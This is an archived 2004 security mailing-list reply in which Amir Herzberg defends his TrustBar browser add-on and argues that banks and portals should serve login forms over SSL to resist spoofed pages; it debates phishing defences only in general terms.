WebApp Sec mailing list archives
Re: TrustBar and insecure sites of PayPal, MS Passport, Yahoo!, Chase, ...
From: Amir Herzberg <herzbea () cs biu ac il>
Date: Tue, 26 Oct 2004 14:50:48 +0200
Yvan G.J. Boily wrote:
That's incorrect. By protecting the login form, we prevent a rogue page which appears as the original, but sends the password to the attacker instead of sending it (securely) to the correct site.The point Mr. Wall was trying to make is that using SSL to "protect" a login page prior to the actual (HTTP Verb) which submits the credentials to the web server does nothing to prevent a user from falling victim to a spoofed web page.
This is mostly correct; TrustBar is a secure user interface mechanism. Our research (and common sense) shows that most users do not validate the URL and the certificate, but do notice our `unprotected page` warning vs. the correct logo of the site.Your trustbar tool is essentially just another way of putting information in front of the users face, however it does nothing that isn't alreadyavailable.
TrustBar also protects from the more advanced (academical?) spoofing attacks, that present fake location bar, padlock etc. But I think that's less important in practice.
Since the "trustbar" is not part of the default distribution of a browser it will not do much to further awareness, or protect a user. This is more so the case because a user who has the understanding to install the software will generally not be caught by a phishing scam or fooled by a spoofed server.
Well... TrustBar is just a research project; we definitely hope the ideas in it will be adopted in future releases of browsers. Also, I think that in many cases, it could be installed on machines of naive users (e.g. by the employer, organization, ISP, etc.). Finally, I actually believe that even security savvy users will find it much more convenient and secure to use TrustBar (or comparable technology) compared to checking manually whenever they use a sensitive site... I definitely feel much better about doing my e-banking now.
<skip>
That's an interesting possibility... I didn't get this feedback in the surveys we did so far, but I'll try to check specifically for it in the future. BTW, I tried doing it on the Chase site and still didn't find any way to reach a protected login page there... is there?The reason this is important is because you claim the "lock" icon is misleading. I say that the lock icon is more intuitive than a "trust bar" or the SSL warnings. People using e-commerce sites have been indoctrinated to "look for the padlock" and "click on it for more information".
Sorry, that's not my intention. In all your arguments, I didn't see an answer to my simple question: why don't they protect the login page??? Considering that there is a trivial fix to the problem, and that I've pointed it out to all these sites before informing others, I can't really see where you find me wrong.It is my opinion that you are likely doing more damage than good by spreading fear, uncertainty, and doubt about a widely used, and commonly accepted practice to which your proposed solution does essentially nothing about.
I apologize if this seems unduly harsh, but I think that you may have lostsight of the intended audience during your academic pursuits.
No offense taken. Best, Amir Herzberg http://AmirHerzberg.com Associate Professor, Computer science department, Bar Ilan University
Current thread:
- Re: TrustBar and insecure sites of PayPal, MS Passport, Yahoo!, Chase, ... Amir Herzberg (Oct 28)
- RE: TrustBar and insecure sites of PayPal, MS Passport, Yahoo!, Chase, ... Yvan G.J. Boily (Oct 28)